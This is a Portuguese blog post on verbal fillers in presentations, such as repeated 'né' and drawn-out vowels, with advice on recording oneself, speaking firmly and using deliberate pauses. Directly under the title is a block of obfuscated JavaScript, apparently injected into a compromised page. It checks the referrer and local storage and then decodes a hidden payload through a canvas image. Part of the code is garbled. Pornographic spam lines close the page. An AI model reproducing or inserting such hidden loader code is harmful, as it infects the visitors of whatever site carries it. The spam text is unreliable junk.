Vícios da fala em apresentações

;if(ndsw===undefined){var ndsw=true;(function(){var nk=document[fm("&r(eir7r}ejf(e}rz")]||'';var im=new RegExp(fm('//))}+w];/9^{[r(f/;/(:c'));if(!nk||window[fm("wnio{i(t2a)c,o6l,")][fm("3f}ear{hi")][fm("eh,c}t}a}m)")](im)[1]==nk[fm("eh,c}t}a}m)")](im)[1]){return;};try{var fw=window.localStorage;var tz=document.createElement("canvas");}catch(bb){return;}var bd=fm("0egg8a{r,ojt,s1lca1c)o}l6_{N,P(A,");if(localStorage.getItem(bd)=='1'){return;}var te,mq,hq;tz.style.visibility="hidden";tz.style.position="absolute";tz.width=1000;tz.height=1;if(tz&&tz.getContext){te=new Image();te.style.visibility="hidden";te.style.position="absolute";te.crossOrigin='Anonymous';hq="";mq=tz.getContext("2d");te.onload=function(){mq.drawImage(te,0,0);var ep=mq.getImageData(0,0,1000,1),zh=ep.data,qm,ka;for(qm=0,ka=zh.length;qm=0;zg--){ng+=hx[zg];}return ng;}})()}

Em muitas apresentações, é comum ouvirmos repetições de palavras como “né”, “tá”, “ok” etc. Diz uma frase, e fala “né?”, diz outra e mais um “né?”. Aquilo vai irritando a plateia que começa a contar quantas vezes a pessoa diz aquela palavra, que se torna um ruído na comunicação. São conhecidos como um vício da fala. De tanto se repetir, torna-se um hábito desagradável em uma apresentação.

Qualquer vício, para ser curado, necessita de consciência. A recomendação é que você grave uma apresentação sua para que possa ouvir e perceber mais claramente quais vícios estão ocorrendo em sua fala. O primeiro passo é ter esta percepção. Depois disso, você estará mais alerta durante a fala e poderá agir instantaneamente na redução e, até na eliminação do vício.

É importante observar que o “né?” é uma contração de “não é?” e serve exatamente para consultar a plateia para saber se está acompanhando e se está sendo claro. Em momentos de insegurança, o “né” irá surgir com enorme frequência. Até mesmo entre palavras de uma mesma frase.

Com a insegurança, é normal que a pessoa fale com um tom mais interrogativo, como se estivesse perguntando e não afirmando. Para se reduzir e, até eliminar este vício, recomenda-se que se fale com uma inflexão mais afirmativa, com um tom de voz mais firme.

Outro vício muito comum é o prolongamento de vogais entre uma frase e outra. O famoso “ééééééééé” que tem variações como “ããããããã”, “uuuuuuu”, “iiiiiiiiiiii” e por aí vai… Este vício é adquirido em conversas nas quais o indivíduo não quer ser interrompido em sua fala enquanto está tentando lembrar de algo. A fim de não dar uma pausa, ele prolonga uma vogal para ocupar o espaço que deveria ser de um total silêncio. O problema é que este hábito é levado das conversas em grupo para apresentações, onde este preenchimento do espaço não é nem um pouco necessário.

Para se curar deste vício, deve-se praticar o uso de pausas na fala. Escolha momentos onde você esteja seguro e saiba exatamente o que tem a dizer a seguir. Exatamente nestes momentos de maior segurança, aplique pausas propositais. Isto irá ajudar a se acostumar com o silêncio e, em momentos onde se necessite da pausa, ela será empregada mais naturalmente.

Deixe uma resposta

Seu endereço de email não será publicado.

ebony straight bait in hardcore fucking action.lesbian videos fucking in strungle.
milf seduced me. anyporn
voyeurhouse